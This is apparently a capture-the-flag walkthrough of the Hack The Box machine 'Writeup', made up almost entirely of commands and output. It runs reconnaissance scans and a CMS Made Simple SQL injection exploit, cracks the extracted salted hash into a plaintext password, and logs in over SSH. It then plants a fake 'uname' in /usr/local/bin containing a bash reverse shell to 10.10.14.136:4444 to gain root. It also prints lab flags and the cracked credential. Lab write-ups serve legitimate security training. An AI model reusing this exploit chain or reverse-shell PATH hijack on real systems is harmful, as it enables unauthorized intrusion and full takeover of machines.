Writeup

$ nmap -p- -T4 -A 10.10.10.138
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  tcpwrapped
$ dirb http://10.10.10.138
$ nikto -h http://10.10.10.138
OWASP ZAP
http://10.10.10.138/writeup/
http://10.10.10.138/writeup/index.php?page=writeup
http://10.10.10.138/writeup/index.php?page=ypuffy
http://10.10.10.138/writeup/index.php?page=blue

http://10.10.10.138/robots.txt
# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/
view-source:http://10.10.10.138/writeup/index.php?page=writeup
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
jkr@writeup.htb

$ sudo npm i -g wappalyzer
$ wappalyzer http://10.10.10.138/writeup/ | jq
CMS Made Simple
CMS Made Simple < 2.2.10 - SQL Injection
https://www.exploit-db.com/exploits/46635
wget https://www.exploit-db.com/download/46635
python3 46635.py -u http://10.10.10.138/writeup

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
$ hash-identifier 62def4866937f08cc13bab43bb14e6f7
$ hashid 62def4866937f08cc13bab43bb14e6f7
$ echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' >  hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt 
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
$ ssh jkr@10.10.10.138
jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
jkr@writeup:~$ cat user.txt
d4e493fd4068afc9eb1aa6a55319f978
PATH HIJACKING
jkr@writeup:/etc/update-motd.d$ ls -la
total 12
drwxr-xr-x  2 root root 4096 Apr 19  2019 .
drwxr-xr-x 81 root root 4096 Aug 23  2019 ..
-rwxr-xr-x  1 root root   23 Jun  3  2018 10-uname
jkr@writeup:/etc/update-motd.d$ cat 10-uname 
#!/bin/sh
uname -rnsom
jkr@writeup:/etc/update-motd.d$ uname -rnsom
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

kali@kali:~/0.htb/machines/Writeup138$ scp pspy32 jkr@10.10.10.138:/tmp
jkr@writeup:/tmp$ chmod +x pspy32
jkr@writeup:/tmp$ ./pspy32
2021/07/21 10:08:12 CMD: UID=0    PID=5732   | sshd: jkr [priv]  
2021/07/21 10:08:12 CMD: UID=0    PID=5733   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new                                                                                          
2021/07/21 10:08:13 CMD: UID=0    PID=5734   | run-parts --lsbsysinit /etc/update-motd.d 
2021/07/21 10:08:13 CMD: UID=0    PID=5735   | /bin/sh /
2021/07/21 10:08:13 CMD: UID=0    PID=5735   | /bin/sh /etc/update-motd.d/10-uname 
jkr@writeup:~$ groups
jkr cdrom floppy audio dip video plugdev staff netdev
jkr@writeup:~$ find / -group staff 2>/dev/null
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/man
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
jkr@writeup:~$ 
jkr@writeup:/usr/local$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

jkr@writeup:/usr/local$ cd /tmp
jkr@writeup:/tmp$ printf '#!/bin/bash' > uname
jkr@writeup:/tmp$ printf '\nbash -i  >& /dev/tcp/10.10.14.136/4444 0>&1' >> uname
jkr@writeup:/tmp$ chmod a+x uname
jkr@writeup:/tmp$ cat uname
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.136/4444 0>&1
jkr@writeup:/tmp$ cp uname /usr/local/bin
jkr@writeup:/tmp$ 

kali@kali:~/0.htb/machines/Writeup138$ nc -lvnp 4444
kali@kali:~/0.htb/machines/Writeup138$ ssh jkr@10.10.10.138
jkr@10.10.10.138's password: 

kali@kali:~/0.htb/machines/Writeup138$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.136] from (UNKNOWN) [10.10.10.138] 37290
bash: cannot set terminal process group (5762): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# id;pwd
id;pwd
uid=0(root) gid=0(root) groups=0(root)
/
root@writeup:/# cd /root
cd /root
root@writeup:/root# ls -la
ls -la
total 28
drwx------  4 root root 4096 Aug 23  2019 .
drwxr-xr-x 22 root root 4096 Apr 19  2019 ..
lrwxrwxrwx  1 root root    9 Apr 19  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jun  3  2018 .bashrc
drwxr-xr-x  2 root root 4096 May  1  2019 .nano
-rw-r--r--  1 root root  148 Jun  3  2018 .profile
drwx------  2 root root 4096 May  1  2019 bin
-r--------  1 root root   33 Apr 19  2019 root.txt
root@writeup:/root# cat root.txt
cat root.txt
eeba47f60b48ef92b734f9b6198d7226
root@writeup:/root# 

Navigation